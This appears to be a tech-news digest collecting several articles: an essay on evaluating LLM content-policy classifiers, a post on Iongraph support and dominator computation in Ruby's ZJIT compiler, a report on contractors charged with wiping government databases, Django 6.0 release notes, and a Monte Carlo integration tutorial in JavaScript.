You are a machine learning engineer at Facebook in Menlo Park. Your task: build the best butt classification model, which decides if there is an exposed butt in an image.

The content policy team in D.C. has written country-specific censorship rules based on cultural tolerance for gluteal cleft—or butt crack, for the uninitiated.

  • Germany: 0% cleft.
  • Zimbabwe: 30% cleft.
  • Cupertino: 0%.
  • Montana: 20%.

A PM on your team writes data labeling guidelines for a business process outsourcing firm (BPO), and each example in your dataset is triple-reviewed by the firm's outsourced team to ensure consistency. You skim the labels, which seem reasonable.

import torch
import pandas as pd
from torch.utils.data import DataLoader, TensorDataset
from sklearn.model_selection import train_test_split

df = pd.read_csv("gluteal_cleft_labels.csv")
X = df.drop("label", axis=1).values
y = df["label"].values
x_train, x_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)

You decide to train a CNN: it'll be perfect for this edge detection task. Two months later, you've cracked it. Your model goes live, great success, 92% precision, 98% recall. You never once had to talk to the policy team in D.C.

2023: The butt model has been in production for 8 years.

Another email: Policy has heard about LLMs and thinks it's time to build a more "context-aware" model. They would like the model to understand whether there is sexually suggestive posing, sexual context, or artistic intent in the image.

You receive a 10 page policy doc. The PM cleans it up a bit and sends it to the BPO. The data is triple reviewed, you skim the labels, and they seem fine.

You make an LLM decision tree, one LLM call per policy section, and aggregate the results. Two months pass. You are stuck at 85% precision and recall, no matter how much prompt engineering and model tuning you do. You try going back to a CNN, training it on the labels. It scores 83%.

Your data science spidey-sense tingles. Something is wrong with the labels or the policy.

You email the policy team, sending them the dataset and results.

The East Coast Metamates say they looked at 20 of the labels. 60% were good, 20% were wrong, 20% were edge cases they hadn’t thought of.

The butt model lives to fight another day, or at least until these discrepancies get sorted out.

2025.

The butt model is still in production… What went wrong?

The train-test split does not work for classification tasks at the frontier of LLM capability.

It doesn't matter if the task is content policy, sales chatbots, legal chatbots, or AI automation in any other industry.

Test Split: Any task complicated enough to require an LLM will need policy expert labels. [1] To detect nudity, outsourced labels will do, but to enforce a 10 page adult policy, you need the expert. Experts have little time: they can't give you enough labels to run your high scale training runs. You can't isolate enough data for a test set without killing your training set size. On top of that, a 10 page policy comes with so much gray area that you can’t debug test set mistakes without looking at test set results and model explanations.

Train Split: You no longer need a large, discrete training set because LLMs often don't need to be trained on data: they need to be given clear rules in natural language, and maybe 5-10 good examples. [2] Today, accuracy improvements come from an engineer better understanding the classification rules and better explaining them to the model, not from tuning hyperparameters or trying novel RL algorithms. Is a discrepancy between the LLM result and the ground truth due to the LLM’s mistake, the labeler’s mistake, or an ambiguous policy line? This requires unprecedented levels of communication between policy and engineering teams.

Recommending a New Split: Don’t train the LLM on any of the dataset. Address the inevitable biases with evaluation on blind, unlabeled data. [3] To understand why this is the best approach, we need to dive deeper into why the train-test split paradigm doesn't suffice.

Core problems with complex classification tasks

Policy Experts write abstract rules. For older classification tasks, the rules had to be simple, because simple was all that models could do. Are there guns in the image? Is there a minor in the image? Complicated tasks are harder to pin down.

  • What is hate speech?
  • What is sexually suggestive?
  • What makes false advertising cross from overdone to illegal?

Take these examples. Sexually suggestive? Artistic expression? Sufficient censorship?

Policy example

Source: Lorde's album covers from Vice.com, where you can find discussion of what is visible or not in each photo.

Most policy documents are not well-kept. A content policy is typically simplified, operationalized, and sent to outsourced teams to enforce. Edge cases and discrepancies found in India never make it back to policy teams in DC, so abstract rules are rarely pinned down.

In production, we see 15-20% false positive rates on BPOs. Half are attributable to human error, half to policy gray area.

To resolve edge cases, labeling tasks require an expert's time. BPO agents can eyeball how much butt is visible, but struggle with what is "sexually suggestive." BPOs are low-wage workers in countries like India or the Philippines, and may have different definitions of "sexual context" than the policy writers intended. The costs of training them are often prohibitive at scale.

Using in-house agents is not sufficient for training data, either, as small alignment issues in the dataset cause large issues in production: If internal agents are 95% accurate (pretty good), the ceiling for the LLM's performance is 95%. If the LLM gets 95% of those labels right, its accuracy will be 90%.

Hard classification tasks have high rates of expert disagreement. Ask two people if there's a gun in an image, odds are they'll agree. Ask two policy experts whether a pose is sexually suggestive per their definition, and you will start a one-hour debate. If two experts only agree 95% of the time, labels are then produced by internal agents at 95% accuracy, and the LLM matches those labels 95% of the time, you are down to roughly 86% effective LLM accuracy.
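The compounding here is just multiplication; a quick sanity check:

# Each imperfect stage caps measurable accuracy multiplicatively.
labeler_accuracy = 0.95   # internal agents vs. ground truth
llm_vs_labels = 0.95      # LLM agreement with those labels
print(f"{labeler_accuracy * llm_vs_labels:.0%}")   # ~90%

expert_agreement = 0.95   # two experts agreeing on the policy itself
print(f"{expert_agreement * labeler_accuracy * llm_vs_labels:.0%}")   # ~86%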

Language models see details in data that even experts miss. LLMs read every word of the product description. They scrutinize every image for a single pixel of gluteal cleft. They see gluteal cleft through sheer clothing, in low opacity, and in the bottom left corner of the back of a t-shirt. Even if experts have reviewed the data, there must be a re-review and feedback loop to check what the LLM has flagged.

Since labels are often wrong or ambiguous, you cannot keep the test set blind. If the LLM is right and the labels are wrong, either because the expert missed something, the policy was ambiguous, or the outsourced labeler was wrong, you have to look at the test set results to check. Moreover, you need to review the LLM's explanation while reviewing the new data to see what it found, confounding any true "blind" test. [4]

In production, we see anywhere from 15-30% error rates in data considered "golden sets" by operations teams.

Given the need for expert input and policy clarifications, you cannot maintain large enough training sets to keep the test set blind. For a simple policy, maintaining good labeled data is straightforward. However, attempting to integrate an LLM is often the first time a policy expert will be asked to scrutinize their rules and labels. Their time is valuable, and they will not be able to bring their expertise to a large dataset.

Complicated policies change, especially under scrutiny, and re-labeling affected examples is time-consuming. A leaner training set will be more valuable than a larger one in the long run.

Since these classification tasks are so complex, you can only "debug" the model by looking at the input and its explanations side-by-side. A policy might have dozens of rules and thousands of possible inputs, creating a fat-tail of model mistakes. Unlike traditional machine learning, where you fix mistakes by changing the design or hyperparameters of your model, you fix LLM mistakes by changing the prompt. You can directly fix a mistake (e.g. by telling the model "do not consider spreading legs fully clothed to be sexually suggestive"), so keeping mistakes hidden only hurts accuracy. [5]

You still need to run blind tests: QA the models on new data. Organizations end up running their models in "shadow mode" on production data, creating test examples without taking real-world actions. Here, you'll likely need an in-house agent to review the examples, then forward edge cases to a policy expert.

The Policy and Engineering Teams Need to be in Direct, Frequent Communication. The SF-DC split doesn't work anymore. Resolving edge cases and, in many cases, changing the policy to reflect patterns identified in the data requires collaboration.

Experts have historically not needed to look at the data—seen as a low-status task—but it is the only way to achieve high accuracy. This is an unsolved problem in many large organizations that blocks LLM integrations.

Most importantly, LLMs do not "train" on data the way traditional classifiers do, so there is often no need to have a "training" set, either. LLMs can enforce complicated, natural language rules because they can take natural language inputs, not because they can learn patterns from thousands of training examples. LLM accuracy is often a prompting task, not a design-your-RL-pipeline task. [1]

If you want a model to classify whether animals are endangered species, don't give it 1,000 examples of elephant ivory, 100 examples of every species on the CITES list, and 1,000 pictures of your non-endangered dog; give it the list of species names as inputs.

The "training" step for language models has to be policy alignment, not heating up GPUs. Since the data will always be flawed and the test set won't be blind, the machine learning engineer's priority should be spent working with policy teams to improve the data. That means surfacing edge cases and policy gray areas, clarifying policy definitions, and leveraging LLM outputs to find more discrepancies until data is high-quality and policy is clear.

In production, this is an ongoing process, as LLMs will always surface new interesting cases and policies will continue to change. Policies and enforcement are better for this feedback loop: it enables consistent, scaled enforcement platform-wide.

Today and Tomorrow

This is a paradigm shift that many machine learning teams, and enterprises as a whole, have not yet embraced. It requires a complete change in how we approach classification tasks.

If this is the road to automation, is it even worthwhile? The process described above, while arduous, is the shortest route to consistent policy enforcement to date. Before LLMs, running a successful quality assurance program would have been prohibitively expensive. Retraining human agents takes far longer than retraining LLMs. Policy experts have historically never been owners of quality assurance processes, but now they can be.

To save a little time, an in-house human agent might do a first review of the results, then a policy expert can review only the discrepancies. We find this tradeoff works well in production.

What are the implications for leveraging LLMs for tasks which do not have binary classifications? Can an LLM be a lawyer if this much work is required to align, evaluate, and test models? Will an LLM ever "know what you mean" and skip all these alignment steps?

One core problem with the LLM architecture is that the model doesn't know when it is wrong. Model improvements over the past few years mean the LLM is right more often, but when it is wrong, it doesn't have an outlet.

This is a perennial machine learning problem: a model does not know what is "out of distribution" for itself.

Until that problem is solved, there will have to be an engineer in the loop improving and testing the model, and a policy expert evaluating the results. You can do this for complicated tasks like writing a patent application, but you have to be rigorous, define a rubric, curate expert data, and regularly evaluate model outputs. Calculating accuracy of each "training run" will never be as easy as checking if model_output == ground_truth, and will require a human in the loop. These complex tasks are far more lucrative than binary classification, and smart people are working on them.

Not everybody will take this rigorous approach, and as models improve, they might not have to. Until then, the highest leverage way to spend your time in 2026 will be looking closely at your data, cleaning your data, and labeling your data.

Launch HN: Browser Buddy (YC W24) – A recommendation system for Internet writing

Hacker News
www.browserbuddy.com
2025-12-04 16:52:56
Comments...
Original Article

A For-You page for writing. Explore the best essays and blogs on the Internet with Browser Buddy.


Adding Iongraph support to ZJIT

Lobsters
railsatscale.com
2025-12-04 16:49:25
Comments...
Original Article

ZJIT adds support for Iongraph, which offers a web-based, pass-by-pass viewer with a stable layout, better navigation, and quality-of-life features like labeled backedges and clickable operands.

Prelude

I’m an intern on the ZJIT team for the fall term. I also have a rather bad habit of being chronically on lobste.rs .

While idly browsing, I spotted an article by Ben Visness titled Who needs Graphviz when you can build it yourself? , which covers his work on creating a novel graph viewer called Iongraph .

Iongraph is used to visualize IR graphs for the SpiderMonkey JIT inside Firefox.

Immediately, I was intrigued. I like looking at new technology and I wondered what it might be like to integrate the work done in Iongraph with ZJIT, getting all sorts of novel and interesting features for free. I suspected that it could also help other engineers to reason about how their optimizations might affect the control flow graph of a given function.

Also, it just looks really cool. It’s got nice colours, good built-in CSS, and is built in a fairly extensible way. The underlying code isn’t hard to read if you need to make changes to it.

Investigating further

Iongraph is compelling for a few reasons.

It supports stable layouts, which means that removing or adding nodes (something that can happen when you run an optimization pass) doesn’t shift the location of other nodes to an extreme degree. Iongraph also gives all sorts of interactive options, like clickable operands, scrollable graphs, or arrow keys to navigate between different nodes.

An especially useful feature is the ability to switch between different compiled methods with a small selector. In our codebase, ZJIT compiles each method on its own, so using a tool like this allows us to inspect method level optimizations all in one pane of a web browser. Of course, there are other great features, like loop header highlighting or being able to click on optimization passes to see what the control flow graph looks like after they’re applied.

Proposal

Roughly an hour after I read through said article, I noticed that my mentor, Max , had also posted it in an internal team chat, mentioning that it would be cool to support it.

Of course, I was tempted by this project. As is common for interns, I was drawn to a new, shiny project despite not knowing what it would actually take to develop it. After talking to Max further, he clarified that this would require significant infrastructure work — or at the very least, more than initially apparent.

Building

A JSON library inside ZJIT?

Looking into the Iongraph format, I figured that I would have to use some sort of JSON crate. Since ZJIT as a project doesn’t rely strictly on using Rust tooling like cargo , directly adding serde_json as a dependency was out of the question. Another compelling option was vendoring it (or a smaller JSON library), but that was likely to include features that we did not want or introduce licensing issues.

After a quick discussion, I settled on implementing the functionality myself. I read a bit of the JSON specification and got a sense of the ideal way to design the library's API. Ultimately, I opted for readability and usability over raw performance. I think this decision is reasonable given that the serialization code is not on the compiler's critical path. The interface is also clean enough that the internals could be replaced in the future with minimal issue should more performance be needed.

In designing the serializer, I chose to target RFC 8259 , which provides more freedom than previous specifications. As noted in said RFC, historical specifications constrained the top-level value to be an array or an object, but this spec (and my implementation) don't require that constraint. I also opted to avoid comments, encode strictly in UTF-8, and escape control characters. Notably, RFC 8259 does not impose a limit on the precision of numbers; it only rules out infinity, negative infinity, and NaN.
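As a rough illustration of that last rule (a JavaScript sketch rather than the actual Rust implementation; serializeNumber is a hypothetical name):

// RFC 8259 puts no limit on the precision of numbers, but Infinity,
// -Infinity, and NaN have no JSON representation and must be rejected.
function serializeNumber(n) {
    if (!Number.isFinite(n)) {
        throw new TypeError("Infinity and NaN cannot be serialized to JSON");
    }
    return String(n); // e.g. 0.1 -> "0.1", 1e21 -> "1e+21"
}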

Computing control flow graph properties

With JSON serialization handled, the more challenging work was computing the graph metadata that Iongraph requires. The format expects explicit successor and predecessor relationships, loop headers, and back edge sources — information that ZJIT doesn’t normally compute since it’s not needed for compilation at this stage of compiler development.

One constraint I had to contend with was that the Iongraph format needs the user to manually provide the successor and predecessor nodes for a given node in a control flow graph. In ZJIT, we compile individual methods at a time as Function s (our internal representation) that hold a graph of Block s. Each Block is a basic block that you would find in a compiler textbook. (One caveat to understand is that we use extended basic blocks, meaning that blocks can have jump instructions at any point in their contained instructions — not just at the end.)

The process of computing successors and predecessors is fairly simple. As you iterate through the list of blocks, all blocks referenced as the target of a jump-like instruction (whether conditional or unconditional) are added to the successor set. Then for each successor, update their predecessor set to include the block currently being operated on.

The next task I had to solve was computing the loop headers and back edge sources.

Computing both of these requires the dominators for blocks in a control flow graph. We can state that a block i dominates a block j if all paths in the control flow graph that reach j must go through i . Several algorithms exist for computing dominators, from simple iterative options to more complicated versions. Initially, I heard of a fixed-point iteration option that was very straightforward to implement but perhaps not the most efficient: it runs in time quadratic in the number of blocks. In A Simple, Fast Dominance Algorithm by Cooper, Harvey, and Kennedy, both this iterative solution and a version tuned to use less space are described. A third option is the Lengauer-Tarjan algorithm, which has better worst-case bounds than both the iterative and tuned implementations.

Based on the goals of the project, I opted to use the iterative algorithm, since it performs well and doesn’t incur serious memory use penalties for a small number of blocks in a control flow graph. It can be described as such:

dom = {}
nodes.each do |node|
  if entry_nodes.include?(node)
    dom[node] = Set[node]
  else
    dom[node] = nodes.to_set
  end
end

changed = true
while changed
  changed = false
  nodes.reverse_post_order.each do |node|
    preds = predecessors(node)
    pred_doms = preds.map { |p| dom[p] }

    # Intersection of all predecessor dominators
    intersection = if pred_doms.empty?
                     Set.new
                   else
                     pred_doms.reduce(:&)
                   end

    # Union with {node}
    new_set = intersection | Set[node]

    if new_set != dom[node]
      dom[node] = new_set
      changed = true
    end
  end
end

Implementing this is fairly simple, and it runs quickly enough for the limited number of nodes that it is totally acceptable.

To compute successors we use the following snippet:

let successors: BTreeSet<BlockId> = block
    .insns
    .iter()
    .map(|&insn_id| uf.find_const(insn_id))
    .filter_map(|insn_id| {
        Self::extract_jump_target(&function.insns[insn_id.0])
    })
    .collect();

Here we go through all the instructions in a given block. We use a union find data structure to map instructions to their canonical representatives (since some optimizations may have merged or aliased instructions). We then filter by extract_jump_target , which returns an Option that contains a BlockId for jump-like instructions.

After finding successors, we can set the predecessors by iterating through the nodes in the successor set and adding the current node to their predecessor sets.

The last important thing we need to consider is finding the loop depth.

To find it, we first need to consider how to identify a natural loop at all.

We identify natural loops by detecting back edges. A back edge occurs when a block has a predecessor that is dominated by that block (all paths to the predecessor pass through this block). When we find such an edge, the target block is a loop header and the predecessor is the source of a back edge. The natural loop consists of all blocks on paths from the back edge source to the loop header (excluding the header itself). Each block within this natural loop then has its loop depth incremented.
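Here is a minimal sketch of that procedure (in JavaScript for illustration rather than ZJIT's Rust), assuming preds maps each block to its predecessor list and dom maps each block to its dominator set as computed above; findNaturalLoops is a hypothetical name:

// For each edge (source -> header): if header dominates source, it is a
// back edge; header is a loop header and source is the back edge source.
function findNaturalLoops(blocks, preds, dom) {
    const loopDepth = new Map(blocks.map(b => [b, 0]));
    for (const header of blocks) {
        for (const source of preds.get(header)) {
            if (!dom.get(source).has(header)) continue; // not a back edge
            // Walk backwards from the source, collecting every block on a
            // path into the header (the header itself is excluded).
            const stack = [source];
            const body = new Set();
            while (stack.length > 0) {
                const b = stack.pop();
                if (b === header || body.has(b)) continue;
                body.add(b);
                stack.push(...preds.get(b));
            }
            for (const b of body) loopDepth.set(b, loopDepth.get(b) + 1);
        }
    }
    return loopDepth;
}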

These additional computations are used within the Iongraph layout engine to determine where a given block should sit vertically, and where lines should be routed within the graph. Loop headers and back edge sources are also marked!

The final result

You can click around this demo graph showing a simple example from ZJIT to get a sense of how Iongraph works! Operands are clickable to get to their definition. You can click on the phases of optimization on the left side - note that only the non-grayed out passes will have made changes. The graph is also zoomable and scrollable!

Hopefully this post was educational! I learned a lot implementing this feature and enjoyed doing so.

If you would like to do some work on ZJIT (and learn a lot in the process), you are welcome to make pull requests to github.com/ruby/ruby/ with the commit prefix ZJIT: . You can find issues here .

Also, feel free to join our Zulip !

Alan Dye Comments on His Career Move in an Instagram Story

Daring Fireball
x.com
2025-12-04 16:31:34
Straight/dumb quotation marks. Some default Instagram typeface. That period just hanging there, outside the closing quote. This is the post from the man who led Apple’s software design for a decade. Not to mention the gall to use any quote from Steve Jobs, let alone this particular one, which is en...

Contractors with hacking records accused of wiping 96 govt databases

Bleeping Computer
www.bleepingcomputer.com
2025-12-04 16:30:59
U.S. prosecutors have charged two Virginia brothers arrested on Wednesday with allegedly conspiring to steal sensitive information and destroy government databases after being fired from their jobs as federal contractors. [...]...
Original Article

Hackers

U.S. prosecutors have charged two Virginia brothers arrested on Wednesday with allegedly conspiring to steal sensitive information and destroy government databases after being fired from their jobs as federal contractors.

Twin brothers Muneeb and Sohaib Akhter, both 34, were also sentenced to several years in prison in June 2015, after pleading guilty to accessing U.S. State Department systems without authorization and stealing personal information belonging to dozens of co-workers and a federal law enforcement agent who was investigating their crimes.

Muneeb Akhter also hacked a private data aggregation company in November 2013 and the website of a cosmetics company in March 2014.

After serving their sentences, they were rehired as government contractors and were indicted again last month on charges of computer fraud, destruction of records, aggravated identity theft, and theft of government information.

"Following the termination of their employment, the brothers allegedly sought to harm the company and its U.S. government customers by accessing computers without authorization, issuing commands to prevent others from modifying the databases before deletion, deleting databases, stealing information, and destroying evidence of their unlawful activities," the Justice Department said in a Wednesday press release .

According to court documents , Muneeb Akhter deleted roughly 96 databases containing U.S. government information in February 2025, including Freedom of Information Act records and sensitive investigative documents from multiple federal agencies.

One minute after deleting a Department of Homeland Security database, Muneeb Akhter also allegedly asked an artificial intelligence tool for instructions on clearing system logs after deleting a database.

The two defendants also allegedly ran commands to prevent others from modifying the targeted databases before deletion, and destroyed evidence of their activities. The prosecutors added that both men wiped company laptops before returning them to the contractor and discussed cleaning out their house in anticipation of a law enforcement search.

The complaint also claims that Muneeb Akhter stole IRS information from a virtual machine, including federal tax data and identifying information for at least 450 individuals, and stole Equal Employment Opportunity Commission information after being fired by the government contractor.

Muneeb Akhter has been charged with conspiracy to commit computer fraud and destroy records, two counts of computer fraud, theft of U.S. government records, and two counts of aggravated identity theft. If found guilty, he faces a minimum of two years in prison for each aggravated identity theft count, with a maximum of 45 years on other charges.

His brother, Sohaib, is charged with conspiracy to commit computer fraud and password trafficking, facing a maximum penalty of six years if convicted.

"These defendants abused their positions as federal contractors to attack government databases and steal sensitive government information. Their actions jeopardized the security of government systems and disrupted agencies' ability to serve the American people," added Acting Assistant Attorney General Matthew R. Galeotti of the DOJ's Criminal Division.


Autism should not be treated as a single condition

Hacker News
www.economist.com
2025-12-04 16:25:31
Comments...

Django 6.0 released

Lobsters
www.djangoproject.com
2025-12-04 16:20:11
Comments...
Original Article

The Django team is happy to announce the release of Django 6.0.

The release notes assemble a mosaic of modern tools and thoughtful design. A few highlights are:

  • Template Partials: modularize templates using small, named fragments for cleaner, more maintainable code. (GSoC project by Farhan Ali Raza , mentored by Carlton Gibson )
  • Background Tasks: run code outside the HTTP request-response cycle with a built-in, flexible task framework. ( Jake Howard )
  • Content Security Policy (CSP): easily configure and enforce browser-level security policies to protect against content injection. ( Rob Hudson )
  • Modernized Email API: compose and send emails with Python's EmailMessage class for a cleaner, Unicode-friendly interface. ( Mike Edmunds )

You can get Django 6.0 from our downloads page or from the Python Package Index .

The PGP key ID used for this release is Natalia Bidart: 2EE82A8D9470983E

With the release of Django 6.0, Django 5.2 has reached the end of mainstream support. The final minor bug fix release, 5.2.9 , was issued yesterday. Django 5.2 will receive security and data loss fixes until April 2028. All users are encouraged to upgrade before then to continue receiving fixes for security issues.

Django 5.1 has reached the end of extended support. The final security release, 5.1.15 , was issued on Dec. 2, 2025. All Django 5.1 users are encouraged to upgrade to a supported Django version.

See the downloads page for a table of supported versions and the future release schedule.

Feynman vs. Computer

Hacker News
entropicthoughts.com
2025-12-04 16:03:02
Comments...
Original Article

I read Burghelea’s article on the Feynman trick for integration . Well, I’m not good enough at analysis to follow along, but I tried reading it anyway because it’s fascinating.

For people who do not have experience with analysis, integration is counting the total size of very many, very small piles of things. Analytical integration, i.e. the process by which we can get an exact result, can be very difficult. It often takes knowledge of special tricks, strong pattern recognition, and plenty of trial and error. Fortunately, in all cases in my career when I’ve needed the value of an integral, an approximate answer has been good enough.

In practical terms, this means we could spend a lot of time learning integration tricks, practice using them, and then take half an hour out of our day to apply them to an integral in front of us … or, hear me out, we could write four lines of JavaScript that arrive at a relatively accurate answer in less than a second.

The approximating power of random numbers

If integration is summing many small piles, we have to figure out how big the piles are. Their height is usually given by a mathematical function, and our first example will be the same as in the Feynman trick article.

\[f(x) = \frac{x - 1}{\ln{x}}\]

This is to be integrated from zero to one, i.e. we want to know the size of the shaded area in the plot below. You can think of each column of shaded pixels as one pile, and we sum the size of all of them to get the total area. (Of course, this is an SVG image, so there are no actual columns of pixels. Alternatively: the more we zoom in, the thinner the columns become – but the more of them there are.) This is why we need integration: it’s dealing with the limit case of infinitely many, infinitely thin columns.

[Figure: feynman-vs-computer-01.svg]

We could imagine drawing six random numbers between zero and one, and plotting piles of the corresponding height at those locations. Since there are six piles, their width is one sixth of the width of the area we are integrating.

[Figure: feynman-vs-computer-02.svg]

Even though some of these piles overlap by chance, and even though there are some random gaps between them, the sum of their areas (0.66) comes very close to the actual shaded area determined analytically (0.69). If we draw more piles, we have to make them correspondingly thinner, but the agreement between their sum and the total size of the area improves.

[Figure: feynman-vs-computer-03.svg]

These are 100× as many piles, and they’re 1/100th as thick to compensate. Their total area is 0.70 – very close to 0.69. If we draw even more piles, we’ll get even closer.

This illustrates a neat correspondence between integrals and expected values. We can frame it mathematically as

\[\int_a^b f(x) \,\mathrm{d}x = (b - a)\, E(f(X))\]

In words, this says that integrating the function \(f\) between \(a\) and \(b\) is the same as taking the expected value of \(f(X)\) at uniformly distributed random points between \(a\) and \(b\), scaled by the width of the interval. (In the simple case where the interval has width one, as in our example, the scale factor disappears.)

Teaching the computer to do it

Here’s a JavaScript function that estimates the value of an integral in the most primitive way possible.

I = (B, lo, hi, f) => {
    // Generate B random values uniformly between lo and hi.
    let xs = Array.from({length: B}, _ => lo + (hi - lo) * Math.random());
    // Compute the value of f at each location.
    let ys = xs.map(f);
    // Return the summed area of the corresponding piles.
    return (hi-lo)*ys.reduce((r, y) => r + y, 0)/ys.length;
}

To compute an approximation to the value of the integral we’ve seen, we run

I(10_000,
  0, 1,
  x => (x-1)/Math.log(x)
);

0.6916867623261724

This is fairly close to 0.69. And we got there in four lines of JavaScript, as promised.

Improved approximation through splittage

We can try this on the next example too. Now we’re asking about the integral

\[\int_0^{\frac{\pi}{2}} \frac{\ln{(1 - \sin{x})}}{\sin{x}} \mathrm{d}x\]

which, translated to JavaScript, becomes

I(10_000,
  0, Math.PI/2,
  x => Math.log(1 - Math.sin(x))/Math.sin(x)
);

-3.67

This is again fairly close to the desired −3.7, but not quite there yet. The tricky shape of the function is the reason we aren’t getting as close as we want.

[Figure: feynman-vs-computer-04.svg]

At the upper endpoint of the integration interval, this function goes to negative infinity. The random piles we draw come primarily from the well behaved region of the function, and thus don’t help the computer realise this behaviour.

[Figure: feynman-vs-computer-05.svg]

There are clever ways to sample adaptively from the trickier parts of the function, but an easy solution is to just visually find a breakpoint, split the interval on that, and then estimate the sensible part separately from the crazy-looking part. Since the total area must be the sum of both areas, we can add their results together for a final estimation.

In this case, we might want to pick e.g. 1.5 as the breakpoint, so we combine the area estimations from 0–1.5 and then 1.5–\(\frac{\pi}{2}\). The result is

I(2_000, 0, 1.5, x => Math.log(1 - Math.sin(x))/Math.sin(x))
+ I(8_000, 1.5, Math.PI/2, x => Math.log(1 - Math.sin(x))/Math.sin(x));

-3.70

which is indeed much closer to the actual value of −3.7.

Note that we aren’t taking more samples, we’re just sprinkling them more wisely over the number line. We spend 2,000 samples in the relatively well-behaved region where the function takes values from −1 to −6, and then we spend the other 8,000 samples in the small region that goes from −6 to negative infinity. Here it is graphically:

[Figure: feynman-vs-computer-06.svg]

The reason this helps us is that this latter region contributes a lot to the value of the integral, but it is so small on the number line that we benefit from oversampling it compared to the other region. This is a form of sample unit engineering , which we have seen before in different contexts.

More evidence of sufficiency

We can continue with some more examples from the Feynman trick article. That gets us the following table.

Integral | Value | Estimation | Difference | Notes
\(\int_0^1 \frac{x-1}{\ln{x}} \mathrm{d}x\) | \(\ln{2}\) | 0.6943 | 0.2 % |
\(\int_0^{\frac{\pi}{2}} \frac{\ln{(1 - \sin{x})}}{\sin{x}} \mathrm{d}x\) | \(\frac{-3 \pi^2}{8}\) | -3.702 | < 0.1 % |
\(\int_0^1 \frac{\ln{(1 - x + x^2)}}{x - x^2} \mathrm{d}x\) | \(\frac{-\pi^2}{9}\) | -1.097 | < 0.1 % |
\(\int_0^{\frac{\pi}{2}} \frac{\arctan{(\sin{x})}}{\sin{x}} \mathrm{d}x\) | \(\frac{\pi}{2}\log{(1 + \sqrt{2})}\) | 1.385 | < 0.1 % |
\(\int_0^\infty x^2 e^{-\left(4x^2 + \frac{9}{x^2}\right)} \mathrm{d}x\) | \(\frac{13 \sqrt{\pi}}{32 e^{12}}\) | 0.000004414 | 0.2 % | (1)
\(\int_0^1 \frac{\ln{x}}{1 - x^2} \mathrm{d}x\) | \(\frac{-\pi^2}{8}\) | -1.227 | 0.5 % | (2)
\(\int_0^\infty \frac{e^{-x^2}}{1 + x^2} \mathrm{d}x\) | \(\frac{\pi e}{2}\mathrm{erfc}(1)\) | 0.6696 | 0.3 % | (3)

Notes:

  1. The integration is from zero to infinity, but the function practically only has a value between zero and three, so that’s the region we estimate over.
  2. This is another case where the function goes to infinity near zero, so we split up the estimation into one for the range 0–0.1, and the other for 0.1–1.0. We have not increased the sample count, only reallocated the 10,000 samples.
  3. Again, the integration is from zero to infinity, but the function practically only has a value between zero and three, so that’s the region we estimate over.

Finding the error without a ground truth

“Now,” the clever reader says, “this is all well and good when we have the actual value to compare to so we know the size of the error. What will we do if we’re evaluating a brand new integral? What is the size of the error then, huh?”

This is why we sampled the function randomly. That means our approximation is a statistical average over samples, and for that we can compute the standard error of the mean. In the JavaScript implementation below, we use the quick variance computation, but we could perhaps more intuitively have used the SPC-inspired method.

Ic = (B, lo, hi, f) => {
    let xs = Array.from(
      {length: B}, _ =>
      lo + (hi - lo) * Math.random()
    );
    let ys = xs.map(f);
    // Compute the variance of the ys from the sum and
    // the sum of squared ys.
    let s = ys.reduce((r, y) => r + y, 0);
    let ssq = ys.reduce((r, y) => r + y**2, 0);
    let v = (ssq - s**2/B)/(B-1);
    // Compute the mean and the standard error of the mean.
    let m = (hi-lo)*s/B;
    let se = (hi-lo)*Math.sqrt(v/B);
    // Compute the 90 % confidence interval of the value of
    // the integral.
    return {
        p05: m - 1.645*se,
        p95: m + 1.645*se,
    }
}

If we run this with the first integral as an example, we’ll learn that

Ic(10_000,
  0, 1,
  x => (x-1)/Math.log(x)
)

Object {
  p05: 0.6896
  p95: 0.6963
}

Not only is this range an illustration of the approximation error (small!), it is also very likely to capture the actual value of the integral. Here are some more examples from the same integrals as above:

5 % 95 % Actual Contained?
0.6904 0.6972 0.6931
-3.7673 -3.6787 -3.7011
-1.0975 -1.0960 -1.0966
1.3832 1.3871 1.3845
0.4372 0.4651 0.4424
-1.2545 -1.2254 -1.2337
0.6619 0.6937 0.6716

These are all built naïvely from 10,000 uniform samples. In other words, in none of the cases has the computation been split up to allocate samples more cleverly.

Again, we could spend a lot of time learning to integrate by hand … or we could ask the computer for less than a second of its time first, and see if the accuracy it achieves is appropriate for our use case. In my experience, it generally is.

Seeing the effect of sample unit engineering

What’s neat is we can still split up the computation like we did before, if we believe it will make the error smaller and the confidence interval narrower. Let’s use the following integral as an example.

\[\int_0^\infty \frac{\sin{x}}{x} \mathrm{d}x\]

This oscillates up and down quite a bit for small \(x\), and then decays but still provides significant contributions for larger \(x\). A naive evaluation would have a confidence interval of

Ic(10_000, 0, 100, x => Math.sin(x)/x)

Object {
  p05: 1.461
  p95: 1.884
}

and while this is certainly correct (the actual value of the integral is half \(\pi\), or approximately 1.571), we can do better. We’ll estimate the region of 0–6 separately from 6–100, using half the samples for each (why put the breakpoint at 6? The period of sin is a full turn, which is roughly 6 radians, ensuring we get roughly symmetric contributions from both integrals; that’s not necessary for the technique to work, but it makes the illustration a little cleaner):

Ic(5_000, 0, 6, x => Math.sin(x)/x)

Object {
  p05: 1.236
  p95: 1.468
}

This contains the bulk of the value of the integral, it seems. Let’s see what remains in the rest of it.

Ic(5_000, 6, 100, x => Math.sin(x)/x)

Object {
  p05: 0.080
  p95: 0.198
}

We can work backwards to what the standard errors must have been to produce these confidence intervals. (The midpoint is the point estimate for each region, and the standard error is 1/1.645 times the distance between the 5 % point and the midpoint.)

Region Value Standard error
0–6 1.4067 0.0372
6–100 0.1390 0.0359

The estimate of the total area would be the two values summed, i.e. 1.5457. The estimate of its standard error we get through Pythagorean addition, and it is approximately 0.05143. We convert it back to a confidence interval and compare with when we did not break the computation up into multiple components.
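As a quick sketch of that combination step (combine is a hypothetical helper; the inputs are the rounded values from the table above, and exact numbers vary from run to run):

// Combine two independent region estimates into a total and a 90 %
// confidence interval; independent standard errors add in quadrature.
let combine = (a, b) => {
    let m = a.value + b.value;
    let se = Math.sqrt(a.se**2 + b.se**2);
    return { p05: m - 1.645*se, p95: m + 1.645*se };
};

combine({ value: 1.4067, se: 0.0372 }, { value: 0.1390, se: 0.0359 });
// → roughly { p05: 1.461, p95: 1.631 }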

Method 5 % 95 % Range
Single operation (10,000 samples) 1.461 1.884 0.423
Two operations (5,000 samples × 2) 1.461 1.630 0.169

